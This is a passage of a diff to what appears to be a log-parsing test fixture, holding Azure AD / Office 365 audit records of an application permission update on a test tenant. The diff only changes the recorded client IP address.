\\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -5406,9 +5406,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:25:54", "ExtendedProperties": [ { @@ -5611,7 +5611,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -5641,9 +5641,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:25:54", "ExtendedProperties": [ { @@ -5846,7 +5846,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"